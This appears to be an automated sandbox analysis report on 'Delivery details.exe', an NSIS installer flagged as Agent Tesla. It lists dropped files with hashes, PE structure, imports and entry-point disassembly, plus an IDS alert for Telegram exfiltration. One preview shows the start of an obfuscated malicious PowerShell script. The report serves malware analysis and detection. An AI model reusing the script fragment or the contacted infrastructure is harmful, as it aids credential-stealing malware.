                                                                Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):3437253
                                                                Entropy (8bit):1.6911845390493845
                                                                Encrypted:false
                                                                SSDEEP:6144:/JuzfCNbqguFkdEOQowDvxVrpBkF5Lgzw9nuta04vbiexxSAbqRfW8Qyc1:/tEWY7lk9nuta00RxDYQ
                                                                MD5:2EBBFCACB88669B23AE4163210EF2E60
                                                                SHA1:4F63AAD55190DBDD06EB1BC3A481ABF8ADDCB0E2
                                                                SHA-256:4AA631102B2326C3CF180ABC52F266144AFA15F30C514A2787A141E62F3989D2
                                                                SHA-512:657B2E7E2424ECE2404E97432E87BFCB56079EB28D16EB1D1F0A1F3D218DC6F709FC450211820C2AC7426ADF96FEA35122D6EFD1957EB8E61CB9D2ECCD3CE099
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:........,...................O...h...........................................a...............................................................................................................................................................................................................G...U...............j...............................................................................................................................................8.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:ASCII text, with very long lines (59516), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):59516
                                                                Entropy (8bit):5.36858597156236
                                                                Encrypted:false
                                                                SSDEEP:768:/FE5XVmMQd8p1X0d9a64PObehS9nXomSW6WLAbTa3GIYEbTqO6aXCXCFPSetuCPa:/F0XcMR1kdc6RxnSXwWJEbTqO9af9XH
                                                                MD5:14B45BD37D696560C5E402D14CB01BBF
                                                                SHA1:8B2F1E28EC706E65C1EB69BCB4DE24BF9CA8AD48
                                                                SHA-256:4E59164AB4028378DC90281D6E9CCA86C3A02687692BC2E68509C18CB8753B4B
                                                                SHA-512:CA9F5954EF908129DAB8EE939191753E55E56D4E38E1D40BCE3F87FACD6DA2C074F2FEB13EA309F2FDC27626FFA17D33107B85C170ECDC722E93728F1920C226
                                                                Malicious:true
                                                                Reputation:low
                                                                Preview:$Virkningsgradwhirl=$Virkningsgradfgangsklassens;<#Decennaries eskalerende Fejltrins Karrys Jaguars Unnooked Ravnes #><#Fjong Kontraster Samfrdselen Unambition Fastlg Cowkine Bichromatic #><#Gennembagning Indskrumpen burgere #><#Proverbialize Personalekompensations Kultureksport Nationalliberalt Observatory Clubwoman Kappas #><#Hyaloliparite Topworked Strejfende Superextension Bvrede Lagerkapaciteters Pommies #><#Finoptller Shedman Confidentiality #><#devoices Platinous Silicam Reslated #><#Sofismes Spilleren Coz Icacinaceae Hyperaction #><#Blighty Fartovertrdelser Ecuelling Snigmorderen agaze Divinationer Spidsvinklens #><#Unsplayed Marmorated Farrant splining #><#Driftstabs Regnvandet Paaskebrygs #><#Diskbetegnelser Udflytningerne Libidins Assapanick Echapper #><#Ungainful Semifinish Jask Genopretninger Splenectomize #><#Gonoblast Expurgate Aeromedical #><#Flabet Betegnende Parcelling #><#Petered Driftsinventars Undispellable Buncal Roodle Holorhinal Lalapalooza #><#Stridskoelle Heli
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):338566
                                                                Entropy (8bit):0.5509473873754586
                                                                Encrypted:false
                                                                SSDEEP:768:am5bz9GowNFFjlSyJTs8nbdTeSPK8kJPwLyWZx+nj3PYaiJ1oGHgn:SIcx
                                                                MD5:B58BC632700F045548A1E0904067982F
                                                                SHA1:56AB0A059FD33822BBBCF17845AD75F5535930B6
                                                                SHA-256:5A5656014CB2FCBFF61344E9B4C4A0C1FD444F7FAC4839661EECA6AE5076E376
                                                                SHA-512:5AE688A739CD6D307B9DE0F740A07BF33F51981B86DB8B982D46D092DFF2D72BEFF3F1FCD0980E0490EDBB180E3A64FBFE0F1911B591459C156B57501C2EACFA
                                                                Malicious:false
                                                                Preview:.q...........................D...........................................................................%.............................8.....Z....................................................................................................................................................................L...........W.........................................................................................<..............................................................................................................S..................................}................................................................:....................................................................................x....................................................................................................U........>.........Q.......................................................................~.......................................................................................................
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):605466
                                                                Entropy (8bit):0.5576062731553693
                                                                Encrypted:false
                                                                SSDEEP:768:Y874cUOnHTenwIahjU3EODe9mAStHy3vCo0RCXqwUGvU+CbiWdL4KZCNmIaeHVly:wPxb8vf8
                                                                MD5:FC23A1D590F2A1693F8779FE2FF38B9D
                                                                SHA1:D852560A8A3F06A8FB933E50FF3AF17BCA4FF0EF
                                                                SHA-256:590DA31E2E55A5E240A3CED27182A8940B1E4257DB52CEFE0CDC9C14351680BE
                                                                SHA-512:1F1BC148ED3BBDB52788D1754610B50B2A7415D031F06147F21BB52F26E920B537FF586F956373CD71DF44215F28C05E02064E2AD23EF1DB539B453F6ABCDB38
                                                                Malicious:false
                                                                Preview:.............................E................................r...............................................................................................................................................,.......................................................o.................................................................................................................................................w...........................H................................................y........\...........;..........................................0....................................................................................................................................................8............................................................5.............................G..............w.....m...........................................................C..............................................................................................z..................................
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):315833
                                                                Entropy (8bit):7.745034101989874
                                                                Encrypted:false
                                                                SSDEEP:6144:XJuzfCNbqguFkdEOQowDvxVrpBkF5Lgzw9nuta04v1:XtEWY7lk9nuta001
                                                                MD5:695DD16688651AC3DEEF1E45F1E83425
                                                                SHA1:8132446C43294DA7507595CA1566010A802F7739
                                                                SHA-256:5D3E471E51484C913B77169AA1448341F0741C35B8A6A84CA2B7A5027AF1EA0B
                                                                SHA-512:498FCE7ADFBBEFA92B124ECA767619FDDA18B04D183AA2C2960A904B4F838C7DB527310308251341FDA8C6011CAE09E54E05AB401EEC80DE28CC66914446EC22
                                                                Malicious:false
                                                                Preview:...7............,...YY..............................[[[[..ZZ......GG..........44.......\......eeeee.d..............q.......::.\\.....77....BBBBB......J..\\...nnnn.......BB...i..........g...........V...........................EEEEE.]...X.....................'.b..{{........d..__..........................M.........VV.....z....e............................`.................._..................ii..............#..1111.g....DD....Z....................ll......;;....................................pp.................................nnn.....................JJJJJJJJJ......... ....c..................w.............................44.....................................EEE....i..|||.....(...HH.J.........ddd...........%%%........................%.........((..aa....../.............7..III...x...;..5555..........DDD.....NNNN.....HHH.......^.c.........................[.PPPP..:::.................&&.......ee...........................333.$.'.................'.........oo..............................tttttt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Category:dropped
                                                                Size (bytes):881136
                                                                Entropy (8bit):7.575238020715874
                                                                Encrypted:false
                                                                SSDEEP:24576:OuQXWj3yekSs7HkSlb+4qTqBY9iMH2FXFZ/Qke:YHSs7Hkcb+pTl91Hipe
                                                                MD5:78AC601A2F48BC5FC7C15EDB4C0FB9D7
                                                                SHA1:43096A0AB5CC82736544F5F25FF01E523CE08C2D
                                                                SHA-256:F5F07D56FB08266E8109ADE046A794451D86B2A3D32228EDE3C096FFE8CCA8CE
                                                                SHA-512:71071CEB1608AB51E3742E3D48EED7834A1A077351E30EE9B2E193CF33506226523F99A7338A20BB219C68B31A32B14CF9DCD718D77EBD0670DDA5CE1EE41C57
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                • Antivirus: Virustotal, Detection: 14%, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.......4............@..................................r....@..............................................8..........(Y...............................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data...X............|..............@....ndata...................................rsrc....8.......:..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:false
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):464
                                                                Entropy (8bit):4.221211340885619
                                                                Encrypted:false
                                                                SSDEEP:12:qaC/J5SFKX6Xv9MLSrZpANkpY2A2EskVjpFxD4Sq/dNEHp8+:qzJEK9LSrZuNkpW+OKSudNEHpR
                                                                MD5:BC56E08D19E6A0F6A565430579BC14BE
                                                                SHA1:CD3CA1DDDA47A39A53A546300D5EC05A8BF7950C
                                                                SHA-256:60E5DB53024A7462646673DCC4305AD18876C99A2E293C1DC1CFD274FE39195F
                                                                SHA-512:B8D1F8BFCA4E3BCFDA79C7788E6ED2F2C65F15FA35E4F1B206264AEC5558B006A5F2A5687EC23B6719CEA8D5B970672703930F57B645DF1172463CD4BAD30D59
                                                                Malicious:false
                                                                Preview:startproduktion reeksporters penality.scanting beskyttelsesvrdiges angiotonic intramurally parallellens kremationer verrucated lazaroners documentizes skralden servante decreeing..sageness doceredes legitime gladii fejlens melanocerite ingreve..weki brnearbejdet opelsk burlesk indazin skivesneglene,arbejdsvgringen sprgere midterste havards milieustttelovgivningen glyceryl..trophothylax opalerne semifinalisternes sortkridtstegningerne gratiners nitrogenization.
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):431707
                                                                Entropy (8bit):0.5543824847888849
                                                                Encrypted:false
                                                                SSDEEP:768:X4bZ7B96xNrcaWrCdBsQF/QfhkCxkmH4YO2YdEW9Sp809BD0X2fRv7iXUj2HeHiZ:ccS
                                                                MD5:B23758B8B767048DA446DA5E058DC195
                                                                SHA1:31328C880608388BA3C75785065AD3DF43BC9661
                                                                SHA-256:76EE475D57C663EE99CF7DE187BF505C9AC76059A387E4E11110BAC5ED803C6D
                                                                SHA-512:63492A997F4AA27C17B70A22279F44CB90D7C7B7A65CACCB531FE6B1542EAC6F77E1EBDA335061BB72F7EAF98C1380AB2EE3C85E67CBDAF21EEA9BEBC0FD3625
                                                                Malicious:false
                                                                Preview:....................................................................x..................................O.................Q............................................................7..........................................................................................................................................................................2..................................................................................R........................................................................e.............................................................................................................................................................................................................................,.......................................................................................R..................R............................../..............................................................................}..............................A....................
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:GTA audio index data (SDT)
                                                                Category:dropped
                                                                Size (bytes):413152
                                                                Entropy (8bit):0.5564660589901251
                                                                Encrypted:false
                                                                SSDEEP:768:wAQ/+s9asp+upgyId3QfO2jYNYSQqJEtbyN6zhGFJuhi1A8B7RuR4z:lai
                                                                MD5:04FC86126129506141D8CB3E768BD17B
                                                                SHA1:04BA5DC104CAB14256231D9C17E30DD427C46027
                                                                SHA-256:D74CBB94C54CB9F9DF6E18A238C61477264EA2616339C9E511F89634DC8B40EA
                                                                SHA-512:61847032A1614A7C4CE1FED0052524447B2F5CFC5A812D6D1A140AC88401338A299CE664CF286660AC645BCD7AFEE8196092CCC93FF139DE9FF72CE951FB7B8E
                                                                Malicious:false
                                                                Preview:.........X.........................................x....................................s..............................................................................................................D....................................................;...........................................x.................................................................................................$...........................................................................................................................................................&.........................................................................................................................*.....................................................................................................................................................................e..........................................................%..................................a...................................................................
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):758956
                                                                Entropy (8bit):0.5507330731731235
                                                                Encrypted:false
                                                                SSDEEP:768:H1nvtnmC3h4fi6v2WJb6rGUDgqwIEYZq4XcQF5+EeEUYXCKdRtaPOKA7tkKNRqe7:7J/xRb/8JS1
                                                                MD5:2F7CCF50A0474987EB154F19AF78073C
                                                                SHA1:19E2AF2009D78694E0987AD36A3F5C7C6BCFFD8C
                                                                SHA-256:8FE7CA276A423AE9E61EFC02130A86DBF345D0E17DCA2CA319E177E08043D0F2
                                                                SHA-512:B6CEEF1EB6058EAD6EF9D662DC499A0CD36CB857318F825BF842ADF09B4A830BDA63CAE3769EA28C452B454542C5E7F3597D2CB217990B996F1394FB7F9152FB
                                                                Malicious:false
                                                                Preview:..................................................................................................................................B..............................0.....................................................................................................................................................................,................................................................Y....................................................................................................U.............r.......*.......c....V..4........................................1..................................................................................................................................................x................?........................................N.......................................................S..........................................R[G............................................................s............................................................
                                                                Process:C:\Users\user\Desktop\Delivery details.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):505457
                                                                Entropy (8bit):0.5597672519627245
                                                                Encrypted:false
                                                                SSDEEP:768:I4TZoaDeuAh3UrnmfcTVY7kTVIGWI6CEwMgjxy/q1DysCK9wT/Jv/tVYCKcANoQb:/QEZWbPP+Y+T
                                                                MD5:CA7667CCF34A9433457AC2AD5075ADCC
                                                                SHA1:17BE9093FA552591B2BD33491A009325A1B4697C
                                                                SHA-256:6339E90A7C46436334E331186EC23558B92894E8FEF2D0B08CA59B0639A43E7F
                                                                SHA-512:2ABA5D0CE01628F97C8229F258D599D40A4DC4BB07E300E6734BDE066B234B9780E787E2261C9DB34D14CF4280AEDCDE3B64200AE1BDE95E4CE29E404DD52BA1
                                                                Malicious:false
                                                                Preview:.........................................S............................................................^..............................................................................................................................................................................................[...............3..............................o...........n........................................................................................e..........................................................J...................................................................................._..............................................................[..%.....................5.............................................J.....................................................................................................................................................................................v.....................c.............$..............................................N...............
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.575238020715874
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:Delivery details.exe
                                                                File size:881'136 bytes
                                                                MD5:78ac601a2f48bc5fc7c15edb4c0fb9d7
                                                                SHA1:43096a0ab5cc82736544f5f25ff01e523ce08c2d
                                                                SHA256:f5f07d56fb08266e8109ade046a794451d86b2a3d32228ede3c096ffe8cca8ce
                                                                SHA512:71071ceb1608ab51e3742e3d48eed7834a1a077351e30ee9b2e193cf33506226523f99a7338a20bb219c68b31a32b14cf9dcd718d77ebd0670dda5ce1ee41c57
                                                                SSDEEP:24576:OuQXWj3yekSs7HkSlb+4qTqBY9iMH2FXFZ/Qke:YHSs7Hkcb+pTl91Hipe
                                                                TLSH:CD150142BD43C265E86C1B31A82A9C150263BD15BD747B1FEBC8B339FBF32925426617
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....
                                                                Icon Hash:031015b73c6c613f
                                                                Entrypoint:0x403489
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                Signature Valid:false
                                                                Signature Issuer:E=paasyninger@Brndvidde.Apo, O=Gadekasernen, OU="Unrewarding Routemen Teutonisk ", CN=Gadekasernen, L=Aignes-et-Puyp\xe9roux, S=Nouvelle-Aquitaine, C=FR
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 22/04/2023 12:26:37 21/04/2026 12:26:37
                                                                Subject Chain
                                                                • E=paasyninger@Brndvidde.Apo, O=Gadekasernen, OU="Unrewarding Routemen Teutonisk ", CN=Gadekasernen, L=Aignes-et-Puyp\xe9roux, S=Nouvelle-Aquitaine, C=FR
                                                                Version:3
                                                                Thumbprint MD5:3B6DE0B5E8C5083A0CE753D1E1F3BB65
                                                                Thumbprint SHA-1:BDCE2713ED170F044ABD00E55F4BC766D3BD33CE
                                                                Thumbprint SHA-256:97A3116B555800596CF31CE425623F190AB489B92BEFBDD412FEE5B4AC31D74A
                                                                Serial:081DEF4D4B09A6DC4F14BE0CCB12B8432F7C65B9
                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                pop edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+14h], ebx
                                                                mov dword ptr [esp+10h], 0040A230h
                                                                mov dword ptr [esp+1Ch], ebx
                                                                call dword ptr [004080ACh]
                                                                call dword ptr [004080A8h]
                                                                and eax, BFFFFFFFh
                                                                cmp ax, 00000006h
                                                                mov dword ptr [0042A24Ch], eax
                                                                je 00007FB2494E9E43h
                                                                push ebx
                                                                call 00007FB2494ED0F1h
                                                                cmp eax, ebx
                                                                je 00007FB2494E9E39h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 004082B0h
                                                                push esi
                                                                call 00007FB2494ED06Bh
                                                                push esi
                                                                call dword ptr [00408150h]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], 00000000h
                                                                jne 00007FB2494E9E1Ch
                                                                push 0000000Ah
                                                                call 00007FB2494ED0C4h
                                                                push 00000008h
                                                                call 00007FB2494ED0BDh
                                                                push 00000006h
                                                                mov dword ptr [0042A244h], eax
                                                                call 00007FB2494ED0B1h
                                                                cmp eax, ebx
                                                                je 00007FB2494E9E41h
                                                                push 0000001Eh
                                                                call eax
                                                                test eax, eax
                                                                je 00007FB2494E9E39h
                                                                or byte ptr [0042A24Fh], 00000040h
                                                                push ebp
                                                                call dword ptr [00408044h]
                                                                push ebx
                                                                call dword ptr [004082A0h]
                                                                mov dword ptr [0042A318h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+34h]
                                                                push 000002B4h
                                                                push eax
                                                                push ebx
                                                                push 004216E8h
                                                                call dword ptr [00408188h]
                                                                push 0040A384h
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x43818.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xd59280x18c8
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x63d10x6400139645791b76bd6f7b8c4472edbbdfe5False0.66515625data6.479451209065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x80000x138e0x1400007eff248f0493620a3fd3f7cadc755bFalse0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xa0000x203580x600ec5bcec782f43a3fb7e8dfbe0d0db4dbFalse0.501953125data4.000739070159718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x2b0000x1f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x4a0000x438180x43a00465e5069e0b692b94fe578bd3b9cf0fcFalse0.6225847677911276data6.02785655832943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x4a3b80x14bf0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9995763509696856
                                                                RT_ICON0x5efa80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.4252632201585236
                                                                RT_ICON0x6f7d00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4607157872608787
                                                                RT_ICON0x78c780x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.46921052631578947
                                                                RT_ICON0x7f4600x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4803142329020333
                                                                RT_ICON0x848e80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4802786962683042
                                                                RT_ICON0x88b100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5267634854771784
                                                                RT_ICON0x8b0b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5710600375234521
                                                                RT_ICON0x8c1600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6319672131147541
                                                                RT_ICON0x8cae80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6950354609929078
                                                                RT_DIALOG0x8cf500x100dataEnglishUnited States0.5234375
                                                                RT_DIALOG0x8d0500x11cdataEnglishUnited States0.6056338028169014
                                                                RT_DIALOG0x8d1700xc4dataEnglishUnited States0.5918367346938775
                                                                RT_DIALOG0x8d2380x60dataEnglishUnited States0.7291666666666666
                                                                RT_GROUP_ICON0x8d2980x92Targa image data - Map 32 x 19440 x 1 +1EnglishUnited States0.7191780821917808
                                                                RT_VERSION0x8d3300x1a8dataEnglishUnited States0.5283018867924528
                                                                RT_MANIFEST0x8d4d80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                DLLImport
                                                                KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                03/15/24-12:36:34.108520TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49716443192.168.2.5149.154.167.220
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Mar 15, 2024 12:36:26.495663881 CET49714443192.168.2.5162.240.109.7
